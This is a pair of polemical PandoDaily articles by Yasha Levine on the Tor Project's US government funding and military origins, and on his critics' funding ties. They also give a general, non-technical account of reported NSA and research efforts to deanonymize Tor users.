“My beef is that your article has no solid technical criticism, but some hand waving about funding. There are so many things you could have nailed Tor for, but instead, you went for lazy low hanging fruit about funding.”

What were these many things I could have nailed Tor for? Well, he was helpful enough to give me a couple of suggestions:

“There are many things about Tor worthy of criticism: A crappy user interface, no auto security updates, no browser sandbox.
Your attacks against Tor’s state dept funding, or Roger’s summer internship in college at the NSA, are stupid though.”

Yes, what sane journalist would care that Tor was created by military intelligence, is currently funded by the government and is almost certainly a giant honeypot. That’s all secondary and “low hanging fruit” compared to the big giant issue of our day: Tor’s crappy user interface.

I thought I’d seen it all when an ACLU technology celebrity took to hurling anti-Semitic smears against my reporting. Until last week. That’s when the Los Angeles Review of Books published an article by a computer researcher/privacy activist named Harry Halpin. The article purported to be a review of Julian Assange’s new book, “When Google Met Wikileaks”—but in the middle of his review, Halpin went off on a longwinded tangent attacking me. He called me a conspiracy theorist for reporting on Tor’s government funding, and falsely accused me and PandoDaily of being funded by the CIA:

If Levine is looking for a pot of magical money that has not been touched by the evils of this world, he could always look at his own employer PandoDaily. Levine and PandoDaily are publicly funded by Greylock Partners, who are senior partners with the [sic] In-Q-Tel, the venture capital wing of the CIA. So, the CIA funded Yasha Levine when he exposed that the State Department funded Tor in order to defend CIA agents. The problem with conspiracy theories — including any analysis of conspiracies as networks — is that one immediately runs up against the incommensurable reality of late capitalism: everything is actually connected.

Halpin later admitted that he lied about the CIA-Pando link, saying he did so in order to “prove” a larger point: that investigative journalism that follows the money—like reporting on Tor’s government financing—is nothing but useless conspiracy mongering. Why? Because everything is “connected” so it’s just silly (and a bit crazy) to make a connection between funding and influence.

Halpin’s editor added two corrections to the piece, including rewording my alleged CIA link to read “So one could argue that the CIA funded Yasha Levine…” And, yes, one could argue that, assuming one was happy to fabricate facts from whole cloth.

As it turned out, Halpin, like the Tor developers and their defenders, had other reasons to try to discredit reporting on funding and conflicts-of-interest. Halpin is the president of LEAP, a small privacy/encryption outfit that gets most of its funding from various government sources—including more than $1 million from Radio Free Asia’s “Open Technology Fund.” This fund just happens to be a major financial backer of the Tor Network; last year alone, the Open Technology Fund gave Tor $600,000. The fund also happens to be run out of the Broadcasting Board of Governors (BBG), an old CIA spinoff dedicated to waging propaganda warfare against regimes hostile to US interests. The BBG—which until recently was called the International Broadcasting Bureau—has also been one of the biggest backers of Tor going back to 2007.

So… Halpin attacks me for reporting on Tor’s conflicted government financing—getting money from the very entities Tor purports to protect the public from—while his privacy startup is funded by the same government agency that funds Tor. And in one of the craziest twists, Halpin—who lied about my and Pando’s CIA ties—turns out to be funded by an organization that was founded by the CIA. No “one could argue” about it. It doesn’t get more absurd than this—or more unethical.

When the attacks first started a few months back, I had thought maybe they were driven by a petty defensive reflex: Many were vocal and public supporters of Tor and recommended it to others as an effective tool to protect them from government surveillance.
Perhaps the article made them look or feel stupid — after all, no one likes being outed as a sucker. But as the attacks on my article rolled on, month after month, I began to realize there was something more going on, for the oldest reason in the books: self-interest, and money.

Most of the privacy activists who attacked my reporting had spent their careers moving through the same tight circle of advocacy groups, think-tanks and nonprofits—all funded by the same small network of government and corporate foundations that fund Tor: Radio Free Asia, State Department, Google, Pierre Omidyar, Ford Foundation. These were people circling the wagons and protecting themselves by smearing critical reporting on Tor’s funding.

Take EFF’s Jillian York. After continuously mocking and playing down concerns about Tor’s funding, York penned an article—”Why we need Tor now more than ever”—that hard-sold Tor as the best and most urgent way for users to protect themselves from government Big Brother surveillance. York made no mention of the government’s ongoing sponsorship of Tor; instead she misrepresented Tor as totally independent since 2006. Without elaborating, she claimed that it “receives funding from a range of sources, including individual donors”:

Initially developed by the U.S. Naval Research Laboratory and DARPA, Tor (which originally stood for “the onion router”) is free software that enables anonymity and censorship circumvention. Since 2006, the Tor Project has operated as a nonprofit organization based out of Massachusetts; it receives funding from a range of sources, including individual donors. Karen Reilly, the Tor Project’s development director, told me that since the organization enabled donations with Bitcoin—the peer-to-peer payment system that allows users to send money anonymously—the organization has seen an uptick in donations, an unsurprising development given their user base.

This is crude sophistry that does a disservice to York’s readers. Sure, Tor might receive funding from a “range of sources,” but the overwhelming majority of Tor’s funding comes from just one: the United States Government, which has continued to provide anywhere from 70 to 100% of Tor’s annual budget since 2007.

Jillian York, of all people, should know better. Her employer, EFF, is one of the biggest promoters of Tor. It was also an early financial sponsor, and was instrumental in helping Tor transition from a US Navy project to an “independent” organization back in 2004. EFF even shares two corporate funders with Tor: Google and the Omidyar Network. Even more importantly: Jillian York sits on the advisory council of Radio Free Asia’s “Open Technology Fund,” the federal government entity and a major backer of Tor that also funds LARB book reviewer Harry Halpin’s company.

Morgan Marquis-Boire, the First Look Media techie who called me a conspiracy theorist for investigating Tor’s funding, is another prime example. Marquis-Boire is listed as a “special advisor” to EFF; he’s also a longtime researcher at Toronto-based Citizen Lab, a forensic tech outfit backed by Google, Ford Foundation, George Soros’ Open Society Institute, Palantir and Canada’s version of USAID. Citizen Lab is also a close partner of Radio Free Asia’s “Open Technology Fund.” Before taking his current job with Omidyar, he was on Google’s payroll.

Then there’s ACLU’s Christopher Soghoian, who compared my Tor reporting to deadly anti-Semitic propaganda. Soghoian has been dubbed the “Ralph Nader for the Internet Age” by Wired, but it’s a curious analogy.
Nader’s fame came from fighting corporate power and greed; but Soghoian has spent his entire career sucking from the corporate teat, indiscriminately moving from one oligarch’s foundation to another: graduate school scholarship from Google in 2006/2007; the Koch brothers’ Institute for Humane Studies, chaired by Charles Koch himself, in 2008/2009; fellowship at Harvard’s Berkman Center for Internet & Society, an outfit funded by the State Department, USAID, Soros, Google, Omidyar, and so on; Soros Open Society fellowship in 2011/2012; TEDGlobal Fellow in 2012, funded in part by Amazon billionaire Jeff Bezos; and most recently, a fellowship at Yale Law School’s Information Society Project, which is funded by Google, Ford Foundation, Soros, Microsoft and many many more.

Not surprisingly, Soghoian’s policy work on privacy and encryption argues that markets are the solution to online privacy and surveillance problems, not laws, regulations or politics. In a recent paper published in the Harvard Journal of Law and Technology—which was co-authored with a former-prosecutor-turned-lobbyist—Soghoian argued that encryption technology, not regulations, was the only thing that could effectively protect Americans from surveillance: “communications of Americans will only be secured through the use of privacy enhancing technologies like encryption, not with regulations prohibiting the use or sale of interception technology.”

No wonder all these people are so upset by my reporting. They’ve branded themselves as radical activists fighting The Man and the corporate surveillance apparatus—while taking money from the US government’s military and foreign policy arms, as well as the biggest and worst corporate violators of our privacy. By branding themselves as radical activists, they appear to share the same interests as the grassroots they seek to influence; exposing their funding conflicts-of-interests makes it hard for them to pose as grassroots radicals. So instead of explaining why getting funding from the very entities that Tor is supposed to protect users from is not a problem, they’ve taken the low road to discredit the very idea of reporting on monetary conflicts-of-interests as either irrelevant, or worse, a sign of mental illness.

Who would’ve thought that many of the people we’ve entrusted with protecting our online privacy have the same values as sleazy K Street lobbyists.

Source: How leading Tor developers and advocates tried to smear me after I reported their US Government ties | PandoDaily
-
Almost everyone involved in developing Tor was (or is) funded by the US government

By Yasha Levine
On July 16, 2014

“The United States government can’t simply run an anonymity system for everybody and then use it themselves only. Because then every time a connection came from it people would say, “Oh, it’s another CIA agent.” If those are the only people using the network.”
—Roger Dingledine, co-founder of the Tor Network, 2004

***

In early July, hacker Jacob Appelbaum and two other security experts published a blockbuster story in conjunction with the German press. They had obtained leaked top secret NSA documents and source code showing that the surveillance agency had targeted and potentially penetrated the Tor Network, a widely used privacy tool considered to be the holy grail of online anonymity.

Internet privacy activists and organizations reacted to the news with shock. For the past decade, they had been promoting Tor as a scrappy but extremely effective grassroots technology that can protect journalists, dissidents and whistleblowers from powerful government forces that want to track their every move online. It was supposed to be the best tool out there. Tor’s been an integral part of EFF’s “Surveillance Self-Defense” privacy toolkit. Edward Snowden is apparently a big fan, and so is Glenn Greenwald, who says it “allows people to surf without governments or secret services being able to monitor them.”

But the German exposé showed Tor providing the opposite of anonymity: it singled out users for total NSA surveillance, potentially sucking up and recording everything they did online. To many in the privacy community, the NSA’s attack on Tor was tantamount to high treason: a fascist violation of a fundamental and sacred human right to privacy and free speech.

The Electronic Frontier Foundation believes Tor to be “essential to freedom of expression.” Appelbaum — a Wikileaks volunteer and Tor developer — considers volunteering for Tor to be a valiant act on par with “going to Spain to fight the Franco fascists” on the side of anarchist revolutionaries.

It’s a nice story, pitting scrappy techno-anarchists against the all-powerful US Imperial machine. But the facts about Tor are not as clear cut or simple as these folks make them out to be…

Let’s start with the basics: Tor was developed, built and financed by the US military-surveillance complex. Tor’s original — and current — purpose is to cloak the online identity of government agents and informants while they are in the field: gathering intelligence, setting up sting operations, giving human intelligence assets a way to report back to their handlers — that kind of thing.

This information is out there, but it’s not very well known, and it’s certainly not emphasized by those who promote it. Peek under Tor’s hood, and you quickly realize that just about everybody involved in developing Tor technology has been and/or still is funded by the Pentagon or a related arm of the US empire. That includes Roger Dingledine, who brought the technology to life under a series of military and federal government contracts. Dingledine even spent a summer working at the NSA.

If you read the fine print on Tor’s website, you’ll see that Tor is still very much in active use by the US government: “A branch of the U.S. Navy uses Tor for open source intelligence gathering, and one of its teams used Tor while deployed in the Middle East recently. Law enforcement uses Tor for visiting or surveilling web sites without leaving government IP addresses in their web logs, and for security during sting operations.”

NSA? DoD? U.S. Navy? Police surveillance? What the hell is going on?
How is it possible that a privacy tool was created by the same military and intelligence agencies that it’s supposed to guard us against? Is it a ruse? A sham? A honeytrap? Maybe I’m just being too paranoid…

Unfortunately, this is not a tinfoil hat conspiracy theory. It is cold hard fact.

Brief history of Tor

The origins of Tor go back to 1995, when military scientists at the Naval Research Laboratory began developing cloaking technology that would prevent someone’s activity on the Internet from being traced back to them. They called it “onion routing” — a method of redirecting traffic into a parallel peer-to-peer network and bouncing it around randomly before sending it off to its final destination. The idea was to move it around so as to confuse and disconnect its origin and destination, and make it impossible for someone to observe who you are or where you’re going on the Internet. Onion routing was like a hustler playing the three-card monte with your traffic: the guy trying to spy on you could watch it going under one card, but he never knew where it would come out.

The technology was funded by the Office of Naval Research and DARPA. Early development was spearheaded by Paul Syverson, Michael Reed and David Goldschlag — all military mathematicians and computer systems researchers working for the Naval Research Laboratory, sitting inside the massive Joint Base Anacostia-Bolling military base in Southeast Washington, D.C.

The original goal of onion routing wasn’t to protect privacy — or at least not in the way most people think of “privacy.” The goal was to allow intelligence and military personnel to work online undercover without fear of being unmasked by someone monitoring their Internet activity.

“As military grade communication devices increasingly depend on the public communications infrastructure, it is important to use that infrastructure in ways that are resistant to traffic analysis. It may also be useful to communicate anonymously, for example when gathering intelligence from public databases,” explained a 1997 paper outlining an early version of onion routing that was published in the Naval Research Labs Review.

In the 90s, as public Internet use and infrastructure grew and multiplied, spooks needed to figure out a way to hide their identity in plain sight online. An undercover spook sitting in a hotel room in a hostile country somewhere couldn’t simply dial up CIA.gov on his browser and log in — anyone sniffing his connection would know who he was. Nor could a military intel agent infiltrate a potential terrorist group masquerading as an online animal rights forum if he had to create an account and log in from an army base IP address. That’s where onion routing came in.

As Michael Reed, one of the inventors of onion routing, explained: providing cover for military and intelligence operations online was their primary objective; everything else was secondary:

The original *QUESTION* posed that led to the invention of Onion Routing was, “Can we build a system that allows for bi-directional communications over the Internet where the source and destination cannot be determined by a mid-point?” The *PURPOSE* was for DoD / Intelligence usage (open source intelligence gathering, covering of forward deployed assets, whatever). Not helping dissidents in repressive countries. Not assisting criminals in covering their electronic tracks. Not helping bit-torrent users avoid MPAA/RIAA prosecution. Not giving a 10 year old a way to bypass an anti-porn filter. Of course, we knew those would be other unavoidable uses for the technology, but that was immaterial to the problem at hand we were trying to solve (and if those uses were going to give us more cover traffic to better hide what we wanted to use the network for, all the better…I once told a flag officer that much to his chagrin).

Apparently solving this problem wasn’t very easy.
Onion router research progressed slowly, with several versions developed and discarded. But in 2002, seven years after it began, the project moved into a different and more active phase. Paul Syverson from the Naval Research Laboratory stayed on the project, but two new guys fresh outta MIT grad school came on board: Roger Dingledine and Nick Mathewson. They were not formally employed by Naval Labs, but were on contract from DARPA and the U.S. Naval Research Laboratory’s Center for High Assurance Computer Systems. For the next several years, the three of them worked on a newer version of onion routing that would later become known as Tor.

Very early on, researchers understood that just designing a system that only technically anonymizes traffic is not enough — not if the system is used exclusively by military and intelligence. In order to cloak spooks better, Tor needed to be used by a diverse group of people: Activists, students, corporate researchers, soccer moms, journalists, drug dealers, hackers, child pornographers, foreign agents, terrorists — the more diverse the group, the better spooks could hide in the crowd in plain sight.

Tor also needed to be moved off site and disassociated from Naval research. As Syverson told Bloomberg in January 2014: “If you have a system that’s only a Navy system, anything popping out of it is obviously from the Navy. You need to have a network that carries traffic for other people as well.”

Dingledine said the same thing a decade earlier at the 2004 Wizards of OS conference in Germany: “The United States government can’t simply run an anonymity system for everybody and then use it themselves only. Because then every time a connection came from it people would say, ‘Oh, it’s another CIA agent.’ If those are the only people using the network.”

The consumer version of Tor would be marketed to everyone and — equally important — would eventually allow anyone to run a Tor node/relay, even from their desktop computer. The idea was to create a massive crowdsourced torrent-style network made up of thousands of volunteers all across the world.

At the very end of 2004, with Tor technology finally ready for deployment, the US Navy cut most of its Tor funding, released it under an open source license and, oddly, the project was handed over to the Electronic Frontier Foundation.

“We funded Roger Dingledine and Nick Mathewson to work on Tor for a single year from November 2004 through October 2005 for $180,000. We then served as a fiscal sponsor for the project until they got their 501(c)(3) status over the next year or two. During that time, we took in less than $50,000 for the project,” EFF’s Dave Maass told me by email.

In a December 2004 press release announcing its support for Tor, EFF curiously failed to mention that this anonymity tool was developed primarily for military and intelligence use. Instead, it focused purely on Tor’s ability to protect free speech from oppressive regimes in the Internet age. “The Tor project is a perfect fit for EFF, because one of our primary goals is to protect the privacy and anonymity of Internet users. Tor can help people exercise their First Amendment right to free, anonymous speech online,” said EFF’s Technology Manager Chris Palmer.

Later on, EFF’s online materials began mentioning that Tor had been developed by the Naval Research Lab, but played down the connection, explaining that it was “in the past.” Meanwhile the organization kept boosting and promoting Tor as a powerful privacy tool: “Your traffic is safer when you use Tor.”

Playing down Tor’s ties to the military…

The people at EFF weren’t the only ones minimizing Tor’s ties to the military. In 2005, Wired published what might have been the first major profile of Tor technology.
The article was written by Kim Zetter, and headlined: “Tor Torches Online Tracking.” Although Zetter was a bit critical of Tor, she made it seem like the anonymity technology had been handed over by the military with no strings attached to “two Boston-based programmers” — Dingledine and Nick Mathewson, who had completely rebuilt the product and ran it independently.

Dingledine and Mathewson might have been based in Boston, but they — and Tor — were hardly independent. At the time that the Wired article went to press in 2005, both had been on the Pentagon payroll for at least three years. And they would continue to be on the federal government’s payroll for at least another seven years.

In fact, in 2004, at the Wizards of OS conference in Germany, Dingledine proudly announced that he was building spy craft tech on the government payroll:

“I forgot to mention earlier something that will make you look at me in a new light. I contract for the United States Government to build anonymity technology for them and deploy it. They don’t think of it as anonymity technology, although we use that term. They think of it as security technology. They need these technologies so they can research people they are interested in, so they can have anonymous tip lines, so that they can buy things from people without other countries knowing what they are buying, how much they are buying and where it is going, that sort of thing.”

Government support kept rolling in well after that. In 2006, Tor research was funded through a no-bid federal contract awarded to Dingledine’s consulting company, Moria Labs. And starting in 2007, the Pentagon cash came directly through the Tor Project itself — thanks to the fact that Team Tor finally left EFF and registered its own independent 501(c)(3) non-profit.

How dependent was — and is — Tor on support from federal government agencies like the Pentagon? In 2007, it appears that all of Tor’s funding came from the federal government via two grants. A quarter million came from the International Broadcasting Bureau (IBB), a CIA spinoff that now operates under the Broadcasting Board of Governors. IBB runs Voice of America and Radio Marti, a propaganda outfit aimed at subverting Cuba’s communist regime. The CIA supposedly cut IBB financing in the 1970s after its ties to Cold War propaganda arms like Radio Free Europe were exposed.

The second chunk of cash — just under $100,000 — came from Internews, an NGO aimed at funding and training dissident and activists abroad. Tor’s subsequent tax filings show that grants from Internews were in fact conduits for “pass through” grants from the US State Department.

In 2008, Tor got $527,000 again from IBB and Internews, which meant that 90% of its funding came from U.S. government sources that year.

In 2009, the federal government provided just over $900,000, or about 90% of the funding. Part of that cash came through a $632,189 federal grant from the State Department, described in tax filings as a “Pass-Through from Internews Network International.” Another $270,000 came via the CIA-spinoff IBB. The Swedish government gave $38,000, while Google gave a minuscule $29,000.

Most of that government cash went out in the form of salaries to Tor administrators and developers. Tor co-founders Dingledine and Mathewson made $120,000. Jacob Appelbaum, the rock star hacker, Wikileaks volunteer and Tor developer, made $96,000.

In 2010, the State Department upped its grant to $913,000 and IBB gave $180,000 — which added up to nearly $1 million out of a total of $1.3 million total funds listed on tax filings that year. Again, a good chunk of that went out as salaries to Tor developers and managers.

In 2011, IBB gave $150,000, while another $730,000 came via Pentagon and State Department grants, which represented more than 70% of the grants that year. (Although based on tax filings, government contracts added up to nearly 100% of Tor’s funding.)
The DoD grant was passed through the Stanford Research Institute, a cutting edge Cold War military-intel outfit. The Pentagon-SRI grant to Tor was given this description: “Basic and Applied Research and Development in Areas Relating to the Navy Command, Control, Communications, Computers, Intelligence, Surveillance, and Reconnaissance.”

That year, a new government funder came on the scene: the Swedish International Development Cooperation Agency (SIDA), Sweden’s version of USAID, gave Tor $279,000.

In 2012, Tor nearly doubled its budget, taking in $2.2 million from Pentagon and intel-connected grants: $876,099 came from the DoD, $353,000 from the State Department, $387,800 from IBB.

That same year, Tor lined up an unknown amount of funding from the Broadcasting Board of Governors to finance fast exit nodes.

Tor at the NSA?

In 2013, the Washington Post revealed that the NSA had figured out various ways of unmasking and penetrating the anonymity of the Tor Network.

Since 2006, according to a 49-page research paper titled simply “Tor,” the agency has worked on several methods that, if successful, would allow the NSA to uncloak anonymous traffic on a “wide scale” — effectively by watching communications as they enter and exit the Tor system, rather than trying to follow them inside. One type of attack, for example, would identify users by minute differences in the clock times on their computers.

The evidence came out of Edward Snowden’s NSA leaks. It appeared that the surveillance agency had developed several techniques to get at Tor. One of the documents explained that the NSA was “pretty much guaranteed to succeed.”

Snowden’s leaks revealed another interesting detail: In 2007, Dingledine gave a talk at the NSA’s HQ explaining Tor, and how it worked. The Washington Post published the NSA’s notes from their meeting with Dingledine.
They showed that Dingledine and the NSA mostly talked about the technical details of Tor — how the network works and some of its security/usability tradeoffs. The NSA was curious about “Tor’s customers,” and Dingledine ran down some of the types of people who could benefit from Tor: Blogger Alice, 8 yr. old Alice, Sick Alice, Consumer Alice, Oppressed Alice, Business Alice, Law Enforcement Alice…

Interestingly, Dingledine told the NSA that “the way TOR is spun is dependent on who the ‘spinee’ is” — meaning that he markets Tor technology in different ways to different people?

Interestingly, the Washington Post article described Dingledine’s trip to the NSA as “a wary encounter, akin to mutual intelligence gathering, between a spy agency and a man who built tools to ward off electronic surveillance.” Dingledine told the paper that he came away from that meeting with the feeling that the NSA was trying to hack the Tor network:

“As he spoke to the NSA, Dingledine said in an interview Friday, he suspected the agency was attempting to break into Tor, which is used by millions of people around the world to shield their identities.”

Dingledine may very well have been antagonistic during his meeting with the NSA. Perhaps he was protective over his Tor baby, and didn’t want its original inventors and sponsors in the US government taking it back. But whatever the reason, the antagonism was not likely borne out of some sort of innate ideological hostility towards the US national security state.

Aside from being on the DoD payroll, Dingledine spends a considerable amount of his time meeting and consulting with military, intelligence and law enforcement agencies to explain why Tor’s so great, and instructing them on how to use it. What kind of agencies does he meet with?
The FBI, CIA and DOJ are just a few… And if you listen to Dingledine explain these encounters in some of his public appearances, one does not detect so much as a whiff of antagonism towards intelligence and law enforcement agencies.

In 2013, during a talk at UC San Diego, Dingledine cheerfully recalled how an exuberant FBI agent rushed up to thank him during his recent trip to the FBI:

“So I’ve been doing a lot of talks lately for law enforcement. And pretty much every talk I do these days, some FBI person comes up to me afterwards and says, ‘I use Tor everyday for my job. Thank you.’ Another example is anonymous tips — I was talking to the folks who run the CIA anonymous tip line. It’s called the Iraqi Rewards Program…”

Dingledine’s close collaboration with law enforcement aside, there’s the strangely glib manner in which he dismissed news about the NSA hacking into Tor. He seemed totally unconcerned by the evidence revealed by Snowden’s leaks, and played down the NSA’s capabilities in his comments to the Washington Post: “If those documents actually represent what they can do, they are not as big an adversary as I thought.”

I reached out to Dingledine to ask him about his trip to the NSA and whether he warned the Tor community back in 2007 that he suspected the NSA was targeting Tor users. He didn’t respond.

How safe is Tor, really?

If Dingledine didn’t appear to be fazed by evidence of the NSA’s attack on Tor anonymity, it’s strange considering that an attack by a powerful government entity has been known to be one of Tor’s principal weaknesses for quite some time.

In a 2011 discussion on Tor’s official listserv, Tor developer Mike Perry admitted that Tor might not be very effective against powerful, organized “adversaries” (aka governments) that are capable of monitoring huge swaths of the Internet.

“Extremely well funded adversaries that are able to observe large portions of the Internet can probably break aspects of Tor and may be able to deanonymize users.
This is why the core tor program currently has a version number of 0.2.x and comes with a warning that it is not to be used for “strong anonymity”. (Though I personally don’t believe any adversary can reliably deanonymize *all* tor users . . . but attacks on anonymity are subtle and cumulative in nature).”

Indeed, just last year, Syverson was part of a research team that pretty much proved that Tor can no longer be expected to protect users over the long term.

“Tor is known to be insecure against an adversary that can observe a user’s traffic entering and exiting the anonymity network. Quite simple and efficient techniques can correlate traffic at these separate locations by taking advantage of identifying traffic patterns. As a result, the user and his destination may be identified, completely subverting the protocol’s security goals.”

The researchers concluded: “These results are somewhat gloomy for the current security of the Tor network.”

While Syverson indicated that some of the security issues identified by this research have been addressed in recent Tor versions, the findings only added to a growing list of other research and anecdotal evidence showing Tor’s not as safe as its boosters want you to think — especially when pitted against determined intelligence agencies.

Case-in-point: In December 2013, a 20-year-old Harvard panicked overachiever named Eldo Kim learned just how little protection Tor offered for would-be terrorists. To avoid taking a final exam he wasn’t prepared for, Kim hit up on the idea of sending in a fake bomb threat. To cover his tracks, he used Tor, supposedly the best anonymity service the web had to offer. But it did little to mask his identity from a determined Uncle Sam. A joint investigation, which involved the FBI, the Secret Service and local police, was able to track the fake bomb threat right back to Kim — in less than 24 hours.
As the FBI complaint explained, “Harvard University was able to determine that, in the several hours leading up to the receipt of the e-mail messages described above, ELDO KIM accessed TOR using Harvard’s wireless network.”

All that Tor did was make the cops jump a few extra steps. But it wasn’t hard, nothing that a bit of manpower with full legal authority to access network records couldn’t solve. It helped that Harvard’s network was logging all metadata access on the network — sorta like the NSA.

Over the past few years, U.S. law enforcement has taken control of and shut down a series of illegal child porn and drug marketplaces operating on what should have been untraceable, hyper-anonymous servers running in the Tor cloud.

In 2013, they took down Freedom Hosting, which was accused of being a massive child porn hosting operation — but not before taking control of its servers and intercepting all of its communication with customers. The FBI did the same thing that same year with the online drug superstore Silkroad, which also ran its services in the Tor cloud. Although rookie mistakes helped the FBI unmask the identity of Dread Pirate Roberts, it is still a mystery how they were able to totally take over and control, and even copy, a server run in the Tor cloud — something that is supposed to be impossible.

Back in 2007, a Swedish hacker/researcher named Dan Egerstad showed that just by running a Tor node, he could siphon and read all the unencrypted traffic that went through his chunk of the Tor network. He was able to access logins and passwords to accounts of NGOs, companies, and the embassies of India and Iran. Egerstad thought at first that embassy staff were just being careless with their info, but quickly realized that he had actually stumbled on a hack/surveillance operation in which Tor was being used to covertly access these accounts.
Although Egerstad was a big fan of Tor and still believes that Tor can provide anonymity if used correctly, the experience made him highly suspicious.

He told the Sydney Morning Herald that he thinks many of the major Tor nodes are being run by intelligence agencies or other parties interested in listening in on Tor communication.

“I don’t like speculating about it, but I’m telling people that it is possible. And if you actually look into where these Tor nodes are hosted and how big they are, some of these nodes cost thousands of dollars each month just to host because they’re using lots of bandwidth, they’re heavy-duty servers and so on. Who would pay for this and be anonymous? For example, five of six of them are in Washington D.C.…”

Tor stinks?

Tor supporters point to a cache of NSA documents leaked by Snowden to prove that the agency fears and hates Tor. A 2013 Guardian story based on these docs — written by James Ball, Bruce Schneier and Glenn Greenwald — argues that the agency is all but powerless against the anonymity tool.

…the documents suggest that the fundamental security of the Tor service remains intact. One top-secret presentation, titled ‘Tor Stinks’, states: “We will never be able to de-anonymize all Tor users all the time.” It continues: “With manual analysis we can de-anonymize a very small fraction of Tor users,” and says the agency has had “no success de-anonymizing a user in response” to a specific request. Another top-secret presentation calls Tor “the king of high-secure, low-latency internet anonymity”.

But the NSA docs are far from conclusive and offer conflicting bits of evidence, allowing for multiple interpretations. But the fact is that the NSA and GCHQ clearly have the capability to compromise Tor, but it might take a bit of targeted effort.

One thing is clear: the NSA most certainly does not hate or fear Tor.
And some aspects about Tor are definitely welcomed by the NSA, in part because it helps concentrate potential “targets” in one convenient location.

Tor Stinks… But it Could be Worse

• Critical mass of targets use Tor. Scaring them away might be counterproductive.
• We can increase our success rate and provide more client IPs for individual Tor users.
• We will never get 100% but we don’t need to provide true IPs for every target every time they use Tor.

Tor network is not as difficult to capture as it may seem…

In 2012, Tor co-founder Roger Dingledine revealed that the Tor Network is configured to prioritize speed and route traffic through the fastest servers/nodes available. As a result, the vast bulk of Tor traffic runs through several dozen of the fastest and most dependable servers: “on today’s network, clients choose one of the fastest 5 exit relays around 25-30% of the time, and 80% of their choices come from a pool of 40-50 relays.”

Dingledine was criticized by the Tor community for the obvious reason that funneling traffic through a handful of fast nodes made surveilling and subverting Tor much easier. Anyone can run a Tor node — a research student in Germany, a guy with a FIOS connection in Victorville (which is what I did for a few months), an NSA front out of Hawaii or a guy working for China’s Internet Police. There’s no way of knowing if the people running the fastest, most stable nodes are doing it out of goodwill or because it’s the best way to listen in and subvert the Tor network.

Particularly troubling was that Snowden’s leaks clearly showed the NSA and GCHQ run Tor nodes, and are interested in running more. And running 50 Tor nodes doesn’t seem like it would be too difficult for any of the world’s intelligence agencies — whether American, German, British, Russian, Chinese or Iranian. Hell, if you’re an intelligence agency, there’s no reason not to run a Tor node.
Back in 2005, Dingledine admitted to Wired that this was a “tricky design question” but couldn’t provide a good answer to how they’d handle it. In 2012, he dismissed his critics altogether, explaining that he was perfectly willing to sacrifice security for speed — whatever it took to get more people to use Tor:

This choice goes back to the original discussion that Mike Perry and I were wrestling with a few years ago… if we want to end up with a fast safe network, do we get there by having a slow safe network and hoping it’ll get faster, or by having a fast less-safe network and hoping it’ll get safer? We opted for the “if we don’t stay relevant to the world, Tor will never grow enough” route.

Speaking of spooks running Tor nodes…

If you thought the Tor story couldn’t get any weirder, it can and does. Probably the strangest part of this whole saga is the fact that Edward Snowden ran multiple high-bandwidth Tor nodes while working as an NSA contractor in Hawaii.

This only became publicly known last May, when Tor developer Runa Sandvik (who also drew her salary from Pentagon/State Department sources at Tor) told Wired’s Kevin Poulsen that just two weeks before he would try to get in touch with Glenn Greenwald, Snowden emailed her, explaining that he ran a major Tor node and wanted to get some Tor stickers.

Stickers? Yes, stickers. Here’s Wired:

In his e-mail, Snowden wrote that he personally ran one of the “major tor exits”–a 2 gbps server named “TheSignal”–and was trying to persuade some unnamed coworkers at his office to set up additional servers. He didn’t say where he worked. But he wanted to know if Sandvik could send him a stack of official Tor stickers. (In some post-leak photos of Snowden you can see the Tor sticker on the back of his laptop, next to the EFF sticker).

Snowden’s request for Tor stickers turned into something a bit more intimate.
Turned out that Sandvik was already planning to go to Hawaii for vacation, so she suggested they meet up to talk about communication security and encryption. She wrote Snowden back and offered to give a presentation about Tor to a local audience. Snowden was enthusiastic and offered to set up a crypto party for the occasion.

So the two of them threw a “crypto party” at a local coffee shop in Honolulu, teaching twenty or so locals how to use Tor and encrypt their hard drives. “He introduced himself as Ed. We talked for a bit before everything started. And I remember asking where he worked or what he did, and he didn’t really want to tell,” Sandvik told Wired. But she did learn that Snowden was running more than one Tor exit node, and that he was trying to get some of his buddies at “work” to set up additional Tor nodes…

Hmmm… So Snowden running powerful Tor nodes and trying to get his NSA colleagues to run them, too?

I reached out to Sandvik for comment. She didn’t reply. But Wired’s Poulsen suggested that running Tor nodes and throwing a crypto party was a pet privacy project for Snowden. “Even as he was thinking globally, he was acting locally.”

But it’s hard to imagine a guy with top secret security clearance in the midst of planning to steal a huge cache of secrets would risk running a Tor node to help out the privacy cause. But then, who the hell knows what any of this means.

I guess it’s fitting that Tor’s logo is an onion — because the more layers you peel and the deeper you get, the less things make sense and the more you realize that there is no end or bottom to it. It’s hard to get any straight answers — or even know what questions you should be asking. In that way, the Tor Project more resembles a spook project than a tool designed by a culture that values accountability or transparency.

Source: Almost everyone involved in developing Tor was (or is) funded by the US government | PandoDaily